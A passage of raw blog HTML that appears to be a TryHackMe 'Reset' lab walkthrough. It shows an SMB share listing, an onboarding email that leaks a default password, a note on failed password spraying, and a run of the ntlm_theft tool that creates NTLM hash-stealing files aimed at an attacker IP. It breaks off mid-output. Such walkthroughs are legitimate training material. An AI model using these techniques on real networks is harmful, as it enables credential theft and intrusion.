2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Windows-Boxes\/Reset\/SMB<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">cat<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">rbckog2o.o4o.txt<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Subject:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Welcome<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Reset<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-\ufffdDear<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">USE<\/span><span style=\"color: #BABED8\">R<\/span><span style=\"color: #89DDFF\">&gt;<\/span><span style=\"color: #C3E88D\">,Welcome<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">aboard!<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">We<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">are<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">thrilled<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">have<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">you<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">join<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">our<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">team.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">As<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">discussed<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">during<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">hiring<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">process,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">we<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">are<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">sending<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">you<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">necessary<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">login<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">information<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">access<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">your<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">company<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">account.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Please<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">keep<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">this<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">information<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">confidential<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">and<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">do<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">not<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">share<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">it<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">with<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">anyone.The<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">initial<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">passowrd<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">is:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ResetMe123!We<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">are<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">confident<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">that<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">you<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">will<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">contribute<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">significantly<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">our<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">continued<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">success.<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">We<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">look<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">forward<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">working<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">with<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">you<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">and<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">wish<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">you<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">the<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">very<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">best<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">your<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">new<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">role.Best<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">regards,The<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Reset<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Team<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:23px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>I tried password spraying on using some default username wordlist but did not get anything useful. Also, the other two pdf files have onboarding instructions and explains some of the company policies whcih weren\u2019t useful in any way either.<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"smb: \\onboarding\\&gt; dir\n  .                                   D        0  Sun Jan 28 17:05:43 2024\n  ..                                  D        0  Sun Jan 28 17:05:43 2024\n  bf0mrldc.bcx.pdf                    A  4700896  Mon Jul 17 03:11:53 2023\n  hello.pdf                           A        0  Sun Jan 28 17:05:40 2024\n  hello.txt                           A        0  Sun Jan 28 17:03:08 2024\n  vokoooio.4xd.pdf                    A  3032659  Mon Jul 17 03:12:09 2023\n  vrlxz3nt.v5v.txt                    A      521  Mon Aug 21 13:21:59 2023\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">smb:<\/span><span style=\"color: #BABED8\"> \\o<\/span><span style=\"color: #C3E88D\">nboarding<\/span><span style=\"color: #BABED8\">\\&gt; <\/span><span style=\"color: #C3E88D\">dir<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #82AAFF\">.<\/span><span style=\"color: #BABED8\">                                   <\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Sun<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">28<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #C3E88D\">:05:43<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #82AAFF\">..<\/span><span style=\"color: #BABED8\">                                  <\/span><span style=\"color: #C3E88D\">D<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Sun<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">28<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #C3E88D\">:05:43<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">bf0mrldc.bcx.pdf<\/span><span style=\"color: #BABED8\">                    <\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">4700896<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Mon<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jul<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:11:53<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">hello.pdf<\/span><span style=\"color: #BABED8\">                           <\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Sun<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">28<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #C3E88D\">:05:40<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">hello.txt<\/span><span style=\"color: #BABED8\">                           <\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Sun<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jan<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">28<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #C3E88D\">:03:08<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2024<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">vokoooio.4xd.pdf<\/span><span style=\"color: #BABED8\">                    <\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #F78C6C\">3032659<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Mon<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Jul<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">17<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">03<\/span><span style=\"color: #C3E88D\">:12:09<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">  <\/span><span style=\"color: #FFCB6B\">vrlxz3nt.v5v.txt<\/span><span style=\"color: #BABED8\">                    <\/span><span style=\"color: #C3E88D\">A<\/span><span style=\"color: #BABED8\">      <\/span><span style=\"color: #F78C6C\">521<\/span><span style=\"color: #BABED8\">  <\/span><span style=\"color: #C3E88D\">Mon<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Aug<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">21<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">13<\/span><span style=\"color: #C3E88D\">:21:59<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2023<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:21px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>I tried uploading both .txt and .pdf files but did not get any response in the responder window.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Foothold<\/mark><\/h3>\n\n\n\n<p>Let&#8217;s use this tool called <strong><em><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\"><a href=\"https:\/\/github.com\/Greenwolf\/ntlm_theft\" title=\"ntlm_theft \" target=\"_blank\" rel=\"noopener noreferrer nofollow\">ntlm_theft <\/a><\/mark><\/em><\/strong> for generating multiple types of NTLMv2 hash theft files. <\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/Tools\/ntlm_theft]\n\u2514\u2500$ python3 ntlm_theft.py -g all -s 10.13.1.112 -f test \nCreated: test\/test.scf (BROWSE TO FOLDER)\nCreated: test\/test-(url).url (BROWSE TO FOLDER)\nCreated: test\/test-(icon).url (BROWSE TO FOLDER)\nCreated: test\/test.lnk (BROWSE TO FOLDER)\nCreated: test\/test.rtf (OPEN)\nCreated: test\/test-(stylesheet).xml (OPEN)\nCreated: test\/test-(fulldocx).xml (OPEN)\nCreated: test\/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)\nCreated: test\/test-(includepicture).docx (OPEN)\nCreated: test\/test-(remotetemplate).docx (OPEN)\nCreated: test\/test-(frameset).docx (OPEN)\nCreated: test\/test-(externalcell).xlsx (OPEN)\nCreated: test\/test.wax (OPEN)\nCreated: test\/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)\nCreated: test\/test.asx (OPEN)\nCreated: test\/test.jnlp (OPEN)\nCreated: test\/test.application (DOWNLOAD AND OPEN)\nCreated: test\/test.pdf (OPEN AND ALLOW)\nCreated: test\/zoom-attack-instructions.txt (PASTE TO CHAT)\nCreated: test\/Autorun.inf (BROWSE TO FOLDER)\nCreated: test\/desktop.ini (BROWSE TO FOLDER)\nGeneration Complete.\n\n\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/Tools\/ntlm_theft<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">python3<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ntlm_theft.py<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-g<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">all<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-s<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">10.13<\/span><span style=\"color: #C3E88D\">.1.112<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-f<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test.scf<\/span><span style=\"color: #BABED8\"> (BROWSE <\/span><span style=\"color: #C3E88D\">TO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">FOLDER<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test-<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">url<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #C3E88D\">.url<\/span><span style=\"color: #BABED8\"> (BROWSE <\/span><span style=\"color: #C3E88D\">TO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">FOLDER<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test-<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">icon<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #C3E88D\">.url<\/span><span style=\"color: #BABED8\"> (BROWSE <\/span><span style=\"color: #C3E88D\">TO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">FOLDER<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test.lnk<\/span><span style=\"color: #BABED8\"> (BROWSE <\/span><span style=\"color: #C3E88D\">TO<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">FOLDER<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test.rtf<\/span><span style=\"color: #BABED8\"> (OPEN)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test-<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">stylesheet<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #C3E88D\">.xml<\/span><span style=\"color: #BABED8\"> (OPEN)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test-<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">fulldocx<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #C3E88D\">.xml<\/span><span style=\"color: #BABED8\"> (OPEN)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test.htm<\/span><span style=\"color: #BABED8\"> (OPEN <\/span><span style=\"color: #C3E88D\">FROM<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">DESKTOP<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WITH<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">CHROME,<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">IE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OR<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">EDGE<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test-<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">includepicture<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #C3E88D\">.docx<\/span><span style=\"color: #BABED8\"> (OPEN)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test-<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">remotetemplate<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #C3E88D\">.docx<\/span><span style=\"color: #BABED8\"> (OPEN)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test-<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">frameset<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #C3E88D\">.docx<\/span><span style=\"color: #BABED8\"> (OPEN)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test-<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #FFCB6B\">externalcell<\/span><span style=\"color: #89DDFF\">)<\/span><span style=\"color: #C3E88D\">.xlsx<\/span><span style=\"color: #BABED8\"> (OPEN)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test.wax<\/span><span style=\"color: #BABED8\"> (OPEN)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test.m3u<\/span><span style=\"color: #BABED8\"> (OPEN <\/span><span style=\"color: #C3E88D\">IN<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">WINDOWS<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">MEDIA<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">PLAYER<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ONLY<\/span><span style=\"color: #BABED8\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test.asx<\/span><span style=\"color: #BABED8\"> (OPEN)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test.jnlp<\/span><span style=\"color: #BABED8\"> (OPEN)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Created:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">test\/test.application<\/span><span style=\"color: #BABED8\"> (DOWNLOAD <\/span><span style=\"color: #C3E88D\">AND<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">OPEN<\/span><span style=\"color: 